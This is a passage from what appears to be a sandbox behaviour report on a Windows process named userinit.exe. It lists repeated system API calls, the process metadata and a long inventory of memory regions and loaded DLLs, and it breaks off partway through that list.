[0090.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.776] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.777] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.777] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.777] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.777] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14ec84, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x14ec98, lpMaximumComponentLength=0x14ec94, lpFileSystemFlags=0x14ec90, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14ec98*=0x90c08a66, lpMaximumComponentLength=0x14ec94*=0xff, lpFileSystemFlags=0x14ec90*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0090.777] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14eb88, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.777] GetSystemDefaultLangID () returned 0x2a0409
[0090.777] VerLanguageNameA (in: wLang=0x409, szLang=0x14ec3c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0090.778] ExitProcess (uExitCode=0x0)
Thread:
id = 225
os_tid = 0xf5c
Thread:
id = 226
os_tid = 0xf60
Process:
id = "30"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be6c0"
os_pid = "0xf74"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2770
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2771
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2772
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2773
start_va = 0x1f0000
end_va = 0x22ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 2774
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2775
start_va = 0xe70000
end_va = 0xe78fff
entry_point = 0xe70000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 2776
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2777
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2778
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2779
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 2780
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2782
start_va = 0x5d0000
end_va = 0x6cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 2783
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2784
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2785
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2786
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2787
start_va = 0x3b0000
end_va = 0x3bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 2788
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 2789
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2790
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2791
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2792
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2793
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2794
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2795
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2796
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2797
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2798
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2799
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2800
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2802
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2803
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2804
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2847
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2848
start_va = 0x190000
end_va = 0x190fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2849
start_va = 0x230000
end_va = 0x330fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 2850
start_va = 0x8b0000
end_va = 0x8bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 2851
start_va = 0xe80000
end_va = 0x1a7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e80000"
filename = ""
Region:
id = 2852
start_va = 0x470000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 2853
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2854
start_va = 0x6d0000
end_va = 0x74ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006d0000"
filename = ""
Region:
id = 2861
start_va = 0x750000
end_va = 0x82efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000750000"
filename = ""
Region:
id = 2862
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 2863
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2864
start_va = 0x8c0000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2865
start_va = 0x1a80000
end_va = 0x23affff
entry_point = 0x1a80000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 2866
start_va = 0x1b0000
end_va = 0x1b6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 2867
start_va = 0x1c0000
end_va = 0x1c1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 2868
start_va = 0x9d0000
end_va = 0xdc2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009d0000"
filename = ""
Region:
id = 2869
start_va = 0x830000
end_va = 0x8affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000830000"
filename = ""
Region:
id = 2870
start_va = 0x23b0000
end_va = 0x24bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 2877
start_va = 0x24c0000
end_va = 0x25bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024c0000"
filename = ""
Region:
id = 2880
start_va = 0x25c0000
end_va = 0x27bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025c0000"
filename = ""
Region:
id = 2881
start_va = 0x8c0000
end_va = 0x940fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2882
start_va = 0x990000
end_va = 0x9cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000990000"
filename = ""
Region:
id = 2886
start_va = 0xdd0000
end_va = 0xe52fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2887
start_va = 0x8c0000
end_va = 0x944fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2888
start_va = 0xdd0000
end_va = 0xe56fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2893
start_va = 0x8c0000
end_va = 0x948fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2894
start_va = 0xdd0000
end_va = 0xe5afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2895
start_va = 0x8c0000
end_va = 0x94cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2896
start_va = 0xdd0000
end_va = 0xe5efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2901
start_va = 0x8c0000
end_va = 0x950fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2902
start_va = 0xdd0000
end_va = 0xe62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2903
start_va = 0x8c0000
end_va = 0x954fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2907
start_va = 0xdd0000
end_va = 0xe66fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2908
start_va = 0x8c0000
end_va = 0x958fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2909
start_va = 0xdd0000
end_va = 0xe6afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2910
start_va = 0x8c0000
end_va = 0x95cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2914
start_va = 0xdd0000
end_va = 0xe6efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000dd0000"
filename = ""
Region:
id = 2915
start_va = 0x8c0000
end_va = 0x960fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2916
start_va = 0x27c0000
end_va = 0x2862fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2920
start_va = 0x8c0000
end_va = 0x964fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2921
start_va = 0x27c0000
end_va = 0x2866fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2922
start_va = 0x8c0000
end_va = 0x968fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2927
start_va = 0x27c0000
end_va = 0x286afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2928
start_va = 0x8c0000
end_va = 0x96cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2929
start_va = 0x27c0000
end_va = 0x286efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2932
start_va = 0x8c0000
end_va = 0x970fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2933
start_va = 0x27c0000
end_va = 0x2872fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2934
start_va = 0x8c0000
end_va = 0x974fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2938
start_va = 0x27c0000
end_va = 0x2876fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2939
start_va = 0x8c0000
end_va = 0x978fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2940
start_va = 0x27c0000
end_va = 0x287afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2944
start_va = 0x8c0000
end_va = 0x97cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2945
start_va = 0x27c0000
end_va = 0x287efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2948
start_va = 0x8c0000
end_va = 0x980fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2949
start_va = 0x27c0000
end_va = 0x2882fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2950
start_va = 0x8c0000
end_va = 0x984fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2954
start_va = 0x27c0000
end_va = 0x2886fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2955
start_va = 0x8c0000
end_va = 0x988fff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2958
start_va = 0x27c0000
end_va = 0x288afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2959
start_va = 0x8c0000
end_va = 0x98cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 2962
start_va = 0x27c0000
end_va = 0x288efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2963
start_va = 0x2890000
end_va = 0x2960fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002890000"
filename = ""
Region:
id = 2964
start_va = 0x2970000
end_va = 0x2a42fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 2968
start_va = 0x27c0000
end_va = 0x2894fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2969
start_va = 0x28a0000
end_va = 0x2976fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 2972
start_va = 0x27c0000
end_va = 0x2898fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2973
start_va = 0x28a0000
end_va = 0x297afff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 2976
start_va = 0x27c0000
end_va = 0x289cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2977
start_va = 0x28a0000
end_va = 0x297efff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 2979
start_va = 0x2980000
end_va = 0x2a60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 2980
start_va = 0x27c0000
end_va = 0x28a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2984
start_va = 0x28b0000
end_va = 0x2994fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 2985
start_va = 0x27c0000
end_va = 0x28a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2988
start_va = 0x28b0000
end_va = 0x2998fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 2989
start_va = 0x27c0000
end_va = 0x28aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2992
start_va = 0x28b0000
end_va = 0x299cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 2993
start_va = 0x27c0000
end_va = 0x28aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 2996
start_va = 0x28b0000
end_va = 0x29a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 2997
start_va = 0x29b0000
end_va = 0x2aa2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 3000
start_va = 0x27c0000
end_va = 0x28b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3001
start_va = 0x28c0000
end_va = 0x29b6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3002
start_va = 0x27c0000
end_va = 0x28b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3005
start_va = 0x28c0000
end_va = 0x29bafff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3008
start_va = 0x27c0000
end_va = 0x28bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3009
start_va = 0x28c0000
end_va = 0x29befff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 3012
start_va = 0x29c0000
end_va = 0x2ac0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029c0000"
filename = ""
Region:
id = 3013
start_va = 0x27c0000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3016
start_va = 0x28d0000
end_va = 0x29d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3019
start_va = 0x27c0000
end_va = 0x28c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3020
start_va = 0x28d0000
end_va = 0x29d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3022
start_va = 0x27c0000
end_va = 0x28cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3039
start_va = 0x28d0000
end_va = 0x29dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 3040
start_va = 0x27c0000
end_va = 0x28cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 3041
start_va = 0x29e0000
end_va = 0x2af2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 3042
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3043
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3044
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3045
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 3046
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3047
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 3048
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 3049
start_va = 0x1d0000
end_va = 0x1d0fff
entry_point = 0x1d0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 3050
start_va = 0x2b00000
end_va = 0x2bfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 3056
start_va = 0x1e0000
end_va = 0x1e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 3057
start_va = 0x6ce90000
end_va = 0x6cea8fff
entry_point = 0x6ce90000
region_type = mapped_file
name = "olepro32.dll"
